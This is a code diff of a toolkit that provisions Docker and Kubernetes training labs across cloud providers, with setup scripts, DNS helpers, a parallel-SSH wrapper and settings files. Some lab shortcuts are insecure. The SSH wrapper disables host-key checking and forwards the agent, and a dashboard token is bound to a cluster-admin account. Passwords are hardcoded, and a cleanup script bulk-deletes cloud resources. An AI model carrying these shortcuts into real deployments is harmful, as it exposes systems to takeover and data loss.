    ingressclass.kubernetes.io/is-default-class: "true"
spec:
  controller: traefik.io/ingress-controller
@@ -70,4 +70,15 @@ add_namespace() {
kubectl create serviceaccount -n kubernetes-dashboard cluster-admin \
  -o yaml --dry-run=client \
  #
echo ---
cat <<EOF
apiVersion: v1
kind: Secret
type: kubernetes.io/service-account-token
metadata:
  name: cluster-admin-token
  namespace: kubernetes-dashboard
  annotations:
    kubernetes.io/service-account.name: cluster-admin
EOF
) > dashboard-with-token.yaml
@@ -2,4 +2,3 @@
base = "slides"
publish = "slides"
command = "./build.sh once"
222  prepare-labs/README.md  Normal file
@@ -0,0 +1,222 @@
# Tools to create lab environments

This directory contains tools to create lab environments for Docker and Kubernetes courses and workshops.

It also contains Terraform configurations that can be used stand-alone to create simple Kubernetes clusters.

Assuming that you have installed all the necessary dependencies, and placed cloud provider access tokens in the right locations, you could do, for instance:

```bash
# For a Docker course with 50 students,
# create 50 VMs on Digital Ocean.
./labctl create --students 50 --settings settings/docker.env --provider digitalocean

# For a Kubernetes training with 20 students,
# create 20 clusters of 4 VMs each using kubeadm,
# on a private Openstack cluster.
./labctl create --students 20 --settings settings/kubernetes.env --provider openstack/enix

# For a Kubernetes workshop with 80 students,
# create 80 clusters with 2 VMs each,
# using Scaleway Kapsule (managed Kubernetes).
./labctl create --students 80 --settings settings/mk8s.env --provider scaleway --mode mk8s
```

Interested? Read on!
## Software requirements

For Docker labs and Kubernetes labs based on kubeadm:

- [Parallel SSH](https://github.com/lilydjwg/pssh)
  (should be installable with `pip install git+https://github.com/lilydjwg/pssh`;
  on a Mac, try `brew install pssh`)

For all labs:

- Terraform

If you want to generate printable cards:

- [pyyaml](https://pypi.python.org/pypi/PyYAML)
- [jinja2](https://pypi.python.org/pypi/Jinja2)

These require Python 3. If you are on a Mac, see below for specific instructions on making Python 3 the default Python. In particular, if you installed `mosh`, Homebrew may have changed your default Python to Python 2.

You will also need an account with the cloud provider(s) that you want to use to deploy the lab environments.
## Cloud provider account(s) and credentials

These scripts create VMs or Kubernetes clusters on cloud providers, so you will need cloud provider account(s) and credentials.

Generally, we try to use the credentials stored in the configuration file used by the cloud providers' CLI tools.

This means, for instance, that for Linode, if you install `linode-cli` and configure it properly, it will place your credentials in `~/.config/linode-cli`, and our Terraform configurations will try to read that file and use the credentials in it.

You don't **have to** install the CLI tools of the cloud provider(s) that you want to use; but we recommend that you do.

If you want to provide your cloud credentials through other means, you will have to adjust the Terraform configuration files in `terraform/provider-config` accordingly.

Here is where we look for credentials for each provider:

- AWS: Terraform defaults; see [AWS provider documentation][creds-aws] (for instance, you can use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` environment variables, or AWS config and profile files)
- Azure: Terraform defaults; see [AzureRM provider documentation][creds-azure] (typically, you can authenticate with the `az` CLI and Terraform will pick it up automatically)
- Civo: CLI configuration file (`~/.civo.json`)
- Digital Ocean: CLI configuration file (`~/.config/doctl/config.yaml`)
- Exoscale: CLI configuration file (`~/.config/exoscale/exoscale.toml`)
- Google Cloud: we're using "Application Default Credentials (ADC)"; run `gcloud auth application-default login`; note that we'll use the default "project" set in `gcloud` unless you set the `GOOGLE_PROJECT` environment variable
- Hetzner: CLI configuration file (`~/.config/hcloud/cli.toml`)
- Linode: CLI configuration file (`~/.config/linode-cli`)
- OpenStack: you will need to write a tfvars file (check [that example](terraform/virtual-machines/openstack/tfvars.example))
- Oracle: Terraform defaults; see [OCI provider documentation][creds-oci] (for instance, you can set up API keys; or you can use a short-lived token generated by the OCI CLI with `oci session authenticate`)
- OVH: Terraform defaults; see [OVH provider documentation][creds-ovh] (this typically involves setting up 5 `OVH_...` environment variables)
- Scaleway: Terraform defaults; see [Scaleway provider documentation][creds-scw] (for instance, you can set environment variables, but it will also automatically pick up CLI authentication from `~/.config/scw/config.yaml`)

[creds-aws]: https://registry.terraform.io/providers/hashicorp/aws/latest/docs#authentication-and-configuration
[creds-azure]: https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs#authenticating-to-azure
[creds-oci]: https://docs.oracle.com/en-us/iaas/Content/API/SDKDocs/terraformproviderconfiguration.htm#authentication
[creds-ovh]: https://registry.terraform.io/providers/ovh/ovh/latest/docs#provider-configuration
[creds-scw]: https://registry.terraform.io/providers/scaleway/scaleway/latest/docs#authentication
## General Workflow

- fork/clone repo
- make sure your cloud credentials have been configured properly
- run `./labctl create ...` to create lab environments
- run `./labctl destroy ...` when you don't need the environments anymore
## Customizing things

You can edit the `settings/*.env` files, for instance to change the size of the clusters, or the login and password used for the students.

Note that these files are sourced before executing any operation on a specific set of lab environments, which means that you can set Terraform variables by adding lines like the following ones to the `*.env` files:

```bash
export TF_VAR_node_size=GP1.L
export TF_VAR_location=eu-north
```
## `./labctl` Usage

If you run `./labctl` without arguments, it will show a list of available commands.

### Summary of What `./labctl` Does For You

The script will create a Terraform configuration using a provider-specific template.

There are two modes: `pssh` and `mk8s`.

In `pssh` mode, students connect directly to the virtual machines using SSH.

The Terraform configuration creates a bunch of virtual machines, then the provisioning and configuration are done with `pssh`. There are a number of "steps" that are executed on the VMs, to install Docker, install a number of convenient tools, install and set up Kubernetes (if needed)... The list of "steps" to be executed is configured in the `settings/*.env` file.

In `mk8s` mode, students don't connect directly to the virtual machines. Instead, they connect to an SSH server running in a Pod (using the `jpetazzo/shpod` image), itself running on a Kubernetes cluster. The Kubernetes cluster is a managed cluster created by the Terraform configuration.
## `terraform` directory structure and principles

Legend:
- 📁 directory
- 📄 file
- 📄📄📄 multiple files
- 🌍 Terraform configuration that can be used "as-is"

```
📁terraform
├── 📁list-locations
│   └── 📄📄📄 helper scripts
│       (to list available locations for each provider)
├── 📁many-kubernetes
│   └── 📄📄📄 Terraform configuration template
│       (used in mk8s mode)
├── 📁one-kubernetes
│   │   (contains Terraform configurations that can spawn
│   │   a single Kubernetes cluster on a given provider)
│   ├── 📁🌍aws
│   ├── 📁🌍civo
│   ├── 📄common.tf
│   ├── 📁🌍digitalocean
│   └── ...
├── 📁providers
│   ├── 📁aws
│   │   ├── 📄config.tf
│   │   └── 📄variables.tf
│   ├── 📁azure
│   │   ├── 📄config.tf
│   │   └── 📄variables.tf
│   ├── 📁civo
│   │   ├── 📄config.tf
│   │   └── 📄variables.tf
│   ├── 📁digitalocean
│   │   ├── 📄config.tf
│   │   └── 📄variables.tf
│   └── ...
├── 📁tags
│   │   (contains Terraform configurations + other files
│   │   for a specific set of VMs or K8S clusters; these
│   │   are created by labctl)
│   ├── 📁2023-03-27-10-04-79-jp
│   ├── 📁2023-03-27-10-07-41-jp
│   ├── 📁2023-03-27-10-16-418-jp
│   └── ...
└── 📁virtual-machines
    │   (contains Terraform configurations that can spawn
    │   a bunch of virtual machines on a given provider)
    ├── 📁🌍aws
    ├── 📁🌍azure
    ├── 📄common.tf
    ├── 📁🌍digitalocean
    └── ...
```
The directory structure can feel a bit overwhelming at first, but it's built with specific goals in mind.

**Consistent input/output between providers.** The per-provider configurations in `one-kubernetes` all take the same input variables, and provide the same output variables. Same thing for the per-provider configurations in `virtual-machines`.

**Don't repeat yourself.** As much as possible, common variables, definitions, and logic have been factored into the `common.tf` file that you can see in `one-kubernetes` and `virtual-machines`. That file is then symlinked in each provider-specific directory, to make sure that all providers use the same version of the `common.tf` file.

**Don't repeat yourself (again).** The things that are specific to each provider have been placed in the `providers` directory, and are shared between the `one-kubernetes` and the `virtual-machines` configurations. Specifically, for each provider, there is `config.tf` (which contains provider configuration, e.g. how to obtain the credentials for that provider) and `variables.tf` (which contains default values like which location and which VM size to use).

**Terraform configurations should work in `labctl` or standalone, without extra work.** The Terraform configurations (identified by 🌍 in the directory tree above) can be used directly. Just go to one of these directories, `terraform init`, `terraform apply`, and you're good to go. But they can also be used from `labctl`. `labctl` shouldn't barf out if you did a `terraform apply` in one of these directories (because it will only copy the `*.tf` files, and leave alone the other files, like the Terraform state).

The latter means that it should be easy to tweak these configurations, or create a new one, without having to use `labctl` to test it. It also means that if you want to use these configurations but don't care about `labctl`, you absolutely can!
## Miscellaneous info

### Making sure Python 3 is the default (Mac only)

Check the `/usr/local/bin/python` symlink. It should be pointing to
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
instructions.

1) Verify that Python 3 is installed.

```
ls -la /usr/local/Cellar/Python
```

You should see one or more versions of Python 3. If you don't,
install it with `brew install python`.

2) Verify that `python` points to Python 3.

```
ls -la /usr/local/bin/python
```

If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.

```
rm /usr/local/bin/python
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
# where xxxx is the most recent Python 3 version you saw above
```
### AWS specific notes

These instructions assume that you're using a root account. If you'd like to use an IAM user instead, it will need the right permissions. For `pssh` mode, that includes at least `AmazonEC2FullAccess` and `IAMReadOnlyAccess`.

In `pssh` mode, the Terraform configuration currently uses the default VPC and Security Group. If you want to use another one, you'll have to make changes to `terraform/virtual-machines/aws`.

The default VPC Security Group does not open any ports from the Internet by default. So you'll need to add inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`.
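If you prefer adding those rules from the command line rather than the console, something like this should work (a sketch; `sg-0123456789abcdef0` is a hypothetical placeholder for your default Security Group ID):

```bash
# Hypothetical group ID; look yours up with "aws ec2 describe-security-groups".
SG=sg-0123456789abcdef0
aws ec2 authorize-security-group-ingress --group-id $SG \
    --protocol tcp --port 22 --cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress --group-id $SG \
    --protocol tcp --port 8000-8002 --cidr 0.0.0.0/0
```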
33  prepare-labs/cleanup.sh  Executable file
@@ -0,0 +1,33 @@
#!/bin/sh

case "$1-$2" in
  linode-lb)
    linode-cli nodebalancers list --json |
      jq '.[] | select(.label | startswith("ccm-")) | .id' |
      xargs -n1 -P10 linode-cli nodebalancers delete
    ;;
  linode-pvc)
    linode-cli volumes list --json |
      jq '.[] | select(.label | startswith("pvc")) | .id' |
      xargs -n1 -P10 linode-cli volumes delete
    ;;
  digitalocean-lb)
    doctl compute load-balancer list --output json |
      jq .[].id |
      xargs -n1 -P10 doctl compute load-balancer delete --force
    ;;
  digitalocean-pvc)
    doctl compute volume list --output json |
      jq '.[] | select(.name | startswith("pvc-")) | .id' |
      xargs -n1 -P10 doctl compute volume delete --force
    ;;
  scaleway-pvc)
    scw instance volume list --output json |
      jq '.[] | select(.name | contains("_pvc-")) | .id' |
      xargs -n1 -P10 scw instance volume delete
    ;;
  *)
    echo "Unknown combination of provider ('$1') and resource ('$2')."
    ;;
esac
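The script takes a provider and a resource type as positional arguments (see the `case "$1-$2"` dispatch above). For instance, to delete the NodeBalancers left behind by Linode's cloud controller manager after a lab:

```bash
# Deletes all Linode NodeBalancers whose label starts with "ccm-".
./cleanup.sh linode lb
```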
63  prepare-labs/dns-cloudflare.sh  Executable file
@@ -0,0 +1,63 @@
#!/bin/sh
#set -eu

if ! command -v http >/dev/null; then
  echo "Could not find the 'http' command line tool."
  echo "Please install it (the package name might be 'httpie')."
  exit 1
fi

. ~/creds/creds.cloudflare.dns

cloudflare() {
  case "$1" in
    GET|POST|DELETE)
      METHOD="$1"
      shift
      ;;
    *)
      METHOD=""
      ;;
  esac
  URI=$1
  shift
  http --ignore-stdin $METHOD https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
}

_list_zones() {
  cloudflare zones?per_page=100 | jq -r .result[].name
}

_get_zone_id() {
  cloudflare zones?name=$1 | jq -r .result[0].id
}

_populate_zone() {
  ZONE_ID=$(_get_zone_id $1)
  shift
  for IPADDR in $*; do
    case "$IPADDR" in
      *.*) TYPE=A;;
      *:*) TYPE=AAAA;;
    esac
    cloudflare zones/$ZONE_ID/dns_records "name=*" "type=$TYPE" "content=$IPADDR"
    cloudflare zones/$ZONE_ID/dns_records "name=\@" "type=$TYPE" "content=$IPADDR"
  done
}

_clear_zone() {
  ZONE_ID=$(_get_zone_id $1)
  for RECORD_ID in $(
    cloudflare zones/$ZONE_ID/dns_records | jq -r .result[].id
  ); do
    cloudflare DELETE zones/$ZONE_ID/dns_records/$RECORD_ID
  done
}

_add_zone() {
  cloudflare zones "name=$1"
}

echo "This script is still work in progress."
echo "You can source it and then use its individual functions."
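As the final message says, the intended use is to source the script and call its helpers directly. A sketch, assuming `~/creds/creds.cloudflare.dns` exports a valid `CLOUDFLARE_TOKEN` and that `example.com` stands in for one of your zones:

```bash
. ./dns-cloudflare.sh
_list_zones                          # list the zones on the account
_populate_zone example.com 1.2.3.4   # create "*" and "@" A records
_clear_zone example.com              # delete every record in the zone
```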
@@ -2,16 +2,16 @@
 """
 There are two ways to use this script:
 
-1. Pass a file name and a tag name as a single argument.
-   It will load a list of domains from the given file (one per line),
-   and assign them to the clusters corresponding to that tag.
-   There should be more domains than clusters.
-   Example: ./map-dns.py domains.txt 2020-08-15-jp
-
-2. Pass a domain as the 1st argument, and IP addresses then.
+1. Pass a domain as the 1st argument, and IP addresses then.
    It will configure the domain with the listed IP addresses.
    Example: ./map-dns.py open-duck.site 1.2.3.4 2.3.4.5 3.4.5.6
 
+2. Pass two files names as argument, in which case the first
+   file should contain a list of domains, and the second a list of
+   groups of IP addresses, with one group per line.
+   There should be more domains than groups of addresses.
+   Example: ./map-dns.py domains.txt tags/2020-08-15-jp/clusters.txt
+
 In both cases, the domains should be configured to use GANDI LiveDNS.
 """
 import os
@@ -30,18 +30,9 @@ domain_or_domain_file = sys.argv[1]
 if os.path.isfile(domain_or_domain_file):
     domains = open(domain_or_domain_file).read().split()
     domains = [ d for d in domains if not d.startswith('#') ]
-    ips_file_or_tag = sys.argv[2]
-    if os.path.isfile(ips_file_or_tag):
-        lines = open(ips_file_or_tag).read().split('\n')
-        clusters = [line.split() for line in lines]
-    else:
-        ips = open(f"tags/{ips_file_or_tag}/ips.txt").read().split()
-        settings_file = f"tags/{tag}/settings.yaml"
-        clustersize = yaml.safe_load(open(settings_file))["clustersize"]
-        clusters = []
-        while ips:
-            clusters.append(ips[:clustersize])
-            ips = ips[clustersize:]
+    clusters_file = sys.argv[2]
+    lines = open(clusters_file).read().split('\n')
+    clusters = [line.split() for line in lines]
 else:
     domains = [domain_or_domain_file]
     clusters = [sys.argv[2:]]
@@ -1,7 +1,9 @@
 #!/bin/sh
 
+set -eu
+
 # https://open-api.netlify.com/#tag/dnsZone
-[ "$1" ] || {
+[ "${1-}" ] || {
   echo ""
   echo "Add a record in Netlify DNS."
   echo "This script is hardcoded to add a record to container.training".
@@ -12,13 +14,31 @@
   echo "$0 del <recordid>"
   echo ""
   echo "Example to create a A record for eu.container.training:"
-  echo "$0 add eu 185.145.250.0"
+  echo "$0 add eu A 185.145.250.0"
   echo ""
   exit 1
 }
 
-NETLIFY_USERID=$(jq .userId < ~/.config/netlify/config.json)
-NETLIFY_TOKEN=$(jq -r .users[$NETLIFY_USERID].auth.token < ~/.config/netlify/config.json)
+NETLIFY_CONFIG_FILE=~/.config/netlify/config.json
+if ! [ "${DOMAIN-}" ]; then
+  DOMAIN=container.training
+fi
+
+if ! [ -f "$NETLIFY_CONFIG_FILE" ]; then
+  echo "Could not find Netlify configuration file ($NETLIFY_CONFIG_FILE)."
+  echo "Try to run the following command, and try again:"
+  echo "npx netlify-cli login"
+  exit 1
+fi
+
+if ! command -v http >/dev/null; then
+  echo "Could not find the 'http' command line tool."
+  echo "Please install it (the package name might be 'httpie')."
+  exit 1
+fi
+
+NETLIFY_USERID=$(jq .userId < "$NETLIFY_CONFIG_FILE")
+NETLIFY_TOKEN=$(jq -r .users[$NETLIFY_USERID].auth.token < "$NETLIFY_CONFIG_FILE")
 
 netlify() {
   URI=$1
@@ -27,31 +47,33 @@ netlify() {
 }
 
 ZONE_ID=$(netlify dns_zones |
-  jq -r '.[] | select ( .name == "container.training" ) | .id')
+  jq -r '.[] | select ( .name == "'$DOMAIN'" ) | .id')
 
 _list() {
   netlify dns_zones/$ZONE_ID/dns_records |
-    jq -r '.[] | select(.type=="A") | [.hostname, .type, .value, .id] | @tsv'
+    jq -r '.[] | select(.type=="A" or .type=="AAAA") | [.hostname, .type, .value, .id] | @tsv' |
+    sort |
+    column --table
 }
 
 _add() {
-  NAME=$1.container.training
-  ADDR=$2
-
+  NAME=$1.$DOMAIN
+  TYPE=$2
+  VALUE=$3
 
   # It looks like if we create two identical records, then delete one of them,
   # Netlify DNS ends up in a weird state (the name doesn't resolve anymore even
   # though it's still visible through the API and the website?)
 
   if netlify dns_zones/$ZONE_ID/dns_records |
-    jq '.[] | select(.hostname=="'$NAME'" and .type=="A" and .value=="'$ADDR'")' |
+    jq '.[] | select(.hostname=="'$NAME'" and .type=="'$TYPE'" and .value=="'$VALUE'")' |
     grep .
   then
     echo "It looks like that record already exists. Refusing to create it."
    exit 1
   fi
 
-  netlify dns_zones/$ZONE_ID/dns_records type=A hostname=$NAME value=$ADDR ttl=300
+  netlify dns_zones/$ZONE_ID/dns_records type=$TYPE hostname=$NAME value=$VALUE ttl=300
 
   netlify dns_zones/$ZONE_ID/dns_records |
     jq '.[] | select(.hostname=="'$NAME'")'
@@ -70,7 +92,7 @@ case "$1" in
     _list
     ;;
   add)
-    _add $2 $3
+    _add $2 $3 $4
     ;;
   del)
     _del $2
65  prepare-labs/konk.sh  Executable file
@@ -0,0 +1,65 @@
#!/bin/sh
#
# Baseline resource usage per vcluster in our usecase:
# 500 MB RAM
# 10% CPU
# (See https://docs.google.com/document/d/1n0lwp6rQKQUIuo_A5LQ1dgCzrmjkDjmDtNj1Jn92UrI)
# PRO2-XS = 4 core, 16 gb
# Note that we also need 2 volumes per vcluster (one for vcluster itself, one for shpod),
# so we might hit the maximum number of volumes per node!
# (TODO: check what that limit is on Scaleway and Linode)
#
# With vspod:
# 800 MB RAM
# 33% CPU
#

set -e

KONKTAG=konk
PROVIDER=linode
STUDENTS=2

case "$PROVIDER" in
  linode)
    export TF_VAR_node_size=g6-standard-6
    export TF_VAR_location=fr-par
    ;;
  scaleway)
    export TF_VAR_node_size=PRO2-XS
    # For tiny testing purposes, these are okay too:
    #export TF_VAR_node_size=PLAY2-NANO
    export TF_VAR_location=fr-par-2
    ;;
esac

# set kubeconfig file
export KUBECONFIG=~/kubeconfig

if [ "$PROVIDER" = "kind" ]; then
  kind create cluster --name $KONKTAG
  ADDRTYPE=InternalIP
else
  if ! [ -f tags/$KONKTAG/stage2/kubeconfig.101 ]; then
    ./labctl create --mode mk8s --settings settings/konk.env --provider $PROVIDER --tag $KONKTAG
  fi
  cp tags/$KONKTAG/stage2/kubeconfig.101 $KUBECONFIG
  ADDRTYPE=ExternalIP
fi

# set external_ip labels
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="'$ADDRTYPE'")].address}{"\n"}{end}' |
  while read node address ignoredaddresses; do
    kubectl label node $node external_ip=$address
  done

# vcluster all the things
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students $STUDENTS

# install prometheus stack because that's cool
helm upgrade --install --repo https://prometheus-community.github.io/helm-charts \
  --namespace prom-system --create-namespace \
  kube-prometheus-stack kube-prometheus-stack

# and also fix sysctl
kubectl apply -f ../k8s/sysctl.yaml --namespace kube-system
@@ -21,10 +21,13 @@ DEPENDENCIES="
 man
 pssh
 ssh
-wkhtmltopdf
+yq
 "
 
+UNUSED_DEPENDENCIES="
+wkhtmltopdf
+"
+
 # Check for missing dependencies, and issue a warning if necessary.
 missing=0
 for dependency in $DEPENDENCIES; do
@@ -50,20 +50,6 @@ sep() {
   fi
 }
 
-need_infra() {
-  if [ -z "$1" ]; then
-    die "Please specify infrastructure file. (e.g.: infra/aws)"
-  fi
-  if [ "$1" = "--infra" ]; then
-    die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
-  fi
-  if [ ! -f "$1" ]; then
-    die "Infrastructure file $1 doesn't exist."
-  fi
-  . "$1"
-  . "lib/infra/$INFRACLASS.sh"
-}
-
 need_tag() {
   if [ -z "$TAG" ]; then
     die "Please specify a tag. To see available tags, run: $0 tags"
@@ -71,25 +57,12 @@ need_tag() {
   if [ ! -d "tags/$TAG" ]; then
     die "Tag $TAG not found (directory tags/$TAG does not exist)."
   fi
-  for FILE in settings.yaml ips.txt infra.sh; do
+  for FILE in mode provider settings.env status; do
     if [ ! -f "tags/$TAG/$FILE" ]; then
       warning "File tags/$TAG/$FILE not found."
     fi
   done
-  . "tags/$TAG/infra.sh"
-  . "lib/infra/$INFRACLASS.sh"
-}
-
-need_settings() {
-  if [ -z "$1" ]; then
-    die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
-  fi
-  if [ ! -f "$1" ]; then
-    die "Settings file $1 doesn't exist."
+  if [ -f "tags/$TAG/settings.env" ]; then
+    . tags/$TAG/settings.env
   fi
 }
-
-need_login_password() {
-  USER_LOGIN=$(yq -r .user_login < tags/$TAG/settings.yaml)
-  USER_PASSWORD=$(yq -r .user_password < tags/$TAG/settings.yaml)
-}
1583  prepare-labs/lib/commands.sh  Normal file
File diff suppressed because it is too large
7  prepare-labs/lib/containerd-config.toml  Normal file
@@ -0,0 +1,7 @@
version = 2
[plugins."io.containerd.grpc.v1.cri".containerd]
  default_runtime_name = "runc"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
  runtime_type = "io.containerd.runc.v2"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
  SystemdCgroup = true
@@ -1,32 +1,22 @@
 #!/usr/bin/env python3
+import json
 import os
 import sys
 import yaml
 import jinja2
 
 
 # Read settings from user-provided settings file
 context = yaml.safe_load(open(sys.argv[1]))
 
-ips = list(open("ips.txt"))
-clustersize = context["clustersize"]
+context["logins"] = []
+for line in open("logins.jsonl"):
+    if line.strip():
+        context["logins"].append(json.loads(line))
 
 print("---------------------------------------------")
-print("  Number of IPs: {}".format(len(ips)))
-print("  VMs per cluster: {}".format(clustersize))
+print("  Number of cards: {}".format(len(context["logins"])))
 print("---------------------------------------------")
 
-assert len(ips)%clustersize == 0
-
-clusters = []
-
-while ips:
-    cluster = ips[:clustersize]
-    ips = ips[clustersize:]
-    clusters.append(cluster)
-
-context["clusters"] = clusters
-
 template_file_name = context["cards_template"]
 template_file_path = os.path.join(
     os.path.dirname(__file__),
@@ -35,23 +25,23 @@ template_file_path = os.path.join(
     template_file_name
 )
 template = jinja2.Template(open(template_file_path).read())
-with open("ips.html", "w") as f:
+with open("cards.html", "w") as f:
     f.write(template.render(**context))
-print("Generated ips.html")
+print("Generated cards.html")
 
 
 try:
     import pdfkit
     paper_size = context["paper_size"]
     margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
-    with open("ips.html") as f:
-        pdfkit.from_file(f, "ips.pdf", options={
+    with open("cards.html") as f:
+        pdfkit.from_file(f, "cards.pdf", options={
            "page-size": paper_size,
            "margin-top": margin,
            "margin-bottom": margin,
            "margin-left": margin,
            "margin-right": margin,
        })
-    print("Generated ips.pdf")
+    print("Generated cards.pdf")
 except ImportError:
-    print("WARNING: could not import pdfkit; did not generate ips.pdf")
+    print("WARNING: could not import pdfkit; did not generate cards.pdf")
44  prepare-labs/lib/pssh.sh  Normal file
@@ -0,0 +1,44 @@
# This file can be sourced in order to directly run commands on
# a group of VMs whose IPs are located in ips.txt of the directory in which
# the command is run.

pssh() {
  if [ -z "$TAG" ]; then
    >/dev/stderr echo "Variable \$TAG is not set."
    return
  fi

  HOSTFILE="tags/$TAG/ips.txt"

  [ -f $HOSTFILE ] || {
    >/dev/stderr echo "Hostfile $HOSTFILE not found."
    return
  }

  echo "[parallel-ssh] $@"

  # There are some routers that really struggle with the number of TCP
  # connections that we open when deploying large fleets of clusters.
  # We're adding a 1 second delay here, but this can be cranked up if
  # necessary - or down to zero, too.
  sleep ${PSSH_DELAY_PRE-1}

  # When things go wrong, it's convenient to ask pssh to show the output
  # of the failed command. Let's make that easy with a DEBUG env var.
  if [ "$DEBUG" ]; then
    PSSH_I=-i
  else
    PSSH_I=""
  fi

  $(which pssh || which parallel-ssh) -h $HOSTFILE -l ubuntu \
    --par ${PSSH_PARALLEL_CONNECTIONS-100} \
    --timeout 300 \
    -O LogLevel=ERROR \
    -O IdentityFile=tags/$TAG/id_rsa \
    -O UserKnownHostsFile=/dev/null \
    -O StrictHostKeyChecking=no \
    -O ForwardAgent=yes \
    $PSSH_I \
    "$@"
}
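Typical interactive use, per the comment at the top of the file (a sketch; the tag name is a placeholder, one of the directories under `tags/`):

```bash
# Run a command on every VM of a given deployment.
# Setting DEBUG maps to pssh's -i flag, which shows command output inline.
TAG=2023-03-27-10-04-79-jp
. lib/pssh.sh
DEBUG=1 pssh "docker version"
```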
16  prepare-labs/map-dns.sh  Executable file
@@ -0,0 +1,16 @@
#!/bin/sh

DOMAINS=domains.txt
IPS=ips.txt

. ./dns-cloudflare.sh

paste "$DOMAINS" "$IPS" | while read domain ips; do
  if ! [ "$domain" ]; then
    echo "⚠️ No more domains!"
    exit 1
  fi
  _clear_zone "$domain"
  _populate_zone "$domain" $ips
done
echo "✅ All done."
22  prepare-labs/settings/admin-kubenet.env  Normal file
@@ -0,0 +1,22 @@
CLUSTERSIZE=3

CLUSTERPREFIX=kubenet
CLUSTERNUMBER=100

USER_LOGIN=k8s
USER_PASSWORD=training

STEPS="
terraform
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubebins
kubetools
ips
"
22  prepare-labs/settings/admin-kuberouter.env  Normal file
@@ -0,0 +1,22 @@
CLUSTERSIZE=3

CLUSTERPREFIX=kuberouter
CLUSTERNUMBER=200

USER_LOGIN=k8s
USER_PASSWORD=training

STEPS="
terraform
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubebins
kubetools
ips
"
27  prepare-labs/settings/admin-monokube.env  Normal file
@@ -0,0 +1,27 @@
CLUSTERSIZE=1

CLUSTERPREFIX=monokube

# We're sticking to this in the first DMUC lab,
# because it still works with Docker, and doesn't
# require a ServiceAccount signing key.
KUBEVERSION=1.19.11

USER_LOGIN=k8s
USER_PASSWORD=training

STEPS="
terraform
wait
standardize
clusterize
tools
docker
disabledocker
createuser
webssh
tailhist
kubebins
kubetools
ips
"
26  prepare-labs/settings/admin-oldversion.env  Normal file
@@ -0,0 +1,26 @@
CLUSTERSIZE=3

CLUSTERPREFIX=oldversion

USER_LOGIN=k8s
USER_PASSWORD=training

# For a list of old versions, check:
# https://kubernetes.io/releases/patch-releases/#non-active-branch-history
KUBEVERSION=1.28.9

STEPS="
terraform
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"
21  prepare-labs/settings/admin-polykube.env  Normal file
@@ -0,0 +1,21 @@
CLUSTERSIZE=3

CLUSTERPREFIX=polykube

USER_LOGIN=k8s
USER_PASSWORD=training

STEPS="
terraform
wait
standardize
clusterize
tools
kubepkgs
kubebins
createuser
webssh
tailhist
kubetools
ips
"
22  prepare-labs/settings/admin-test.env  Normal file
@@ -0,0 +1,22 @@
CLUSTERSIZE=3

CLUSTERPREFIX=test

USER_LOGIN=k8s
USER_PASSWORD=training

STEPS="
terraform
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"
19  prepare-labs/settings/docker.env  Normal file
@@ -0,0 +1,19 @@
CLUSTERSIZE=1

CLUSTERPREFIX=moby

USER_LOGIN=docker
USER_PASSWORD=training

STEPS="
terraform
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
ips
"
6  prepare-labs/settings/konk.env  Normal file
@@ -0,0 +1,6 @@
CLUSTERSIZE=5

USER_LOGIN=k8s
USER_PASSWORD=

STEPS="terraform stage2"
22  prepare-labs/settings/kubernetes.env  Normal file
@@ -0,0 +1,22 @@
CLUSTERSIZE=4

CLUSTERPREFIX=node

USER_LOGIN=k8s
USER_PASSWORD=training

STEPS="
terraform
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"
23  prepare-labs/settings/largekube.env  Normal file
@@ -0,0 +1,23 @@
CLUSTERSIZE=10
export TF_VAR_node_size=GP1.M

CLUSTERPREFIX=node

USER_LOGIN=k8s
USER_PASSWORD=training

STEPS="
terraform
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"
4  prepare-labs/settings/mk8s.env  Normal file
@@ -0,0 +1,4 @@
USER_LOGIN=k8s
USER_PASSWORD=

STEPS="terraform stage2"
22  prepare-labs/settings/portal.env  Normal file
@@ -0,0 +1,22 @@
#export TF_VAR_node_size=GP4.4
#export TF_VAR_node_size=g6-standard-6
#export TF_VAR_node_size=m7i.xlarge


CLUSTERSIZE=1

CLUSTERPREFIX=CHANGEME

USER_LOGIN=portal
USER_PASSWORD=CHANGEME

STEPS="
terraform
wait
standardize
clusterize
tools
docker
createuser
ips
"
40  prepare-labs/setup-admin-clusters.sh  Executable file
@@ -0,0 +1,40 @@
#!/bin/sh
set -e

PREFIX=$(date +%Y-%m-%d-%H-%M)
PROVIDER=openstack/enix # aws also works
STUDENTS=2
#export TF_VAR_location=eu-north-1
export TF_VAR_node_size=S

SETTINGS=admin-monokube
TAG=$PREFIX-$SETTINGS
./labctl create \
  --tag $TAG \
  --provider $PROVIDER \
  --settings settings/$SETTINGS.env \
  --students $STUDENTS

SETTINGS=admin-polykube
TAG=$PREFIX-$SETTINGS
./labctl create \
  --tag $TAG \
  --provider $PROVIDER \
  --settings settings/$SETTINGS.env \
  --students $STUDENTS

SETTINGS=admin-oldversion
TAG=$PREFIX-$SETTINGS
./labctl create \
  --tag $TAG \
  --provider $PROVIDER \
  --settings settings/$SETTINGS.env \
  --students $STUDENTS

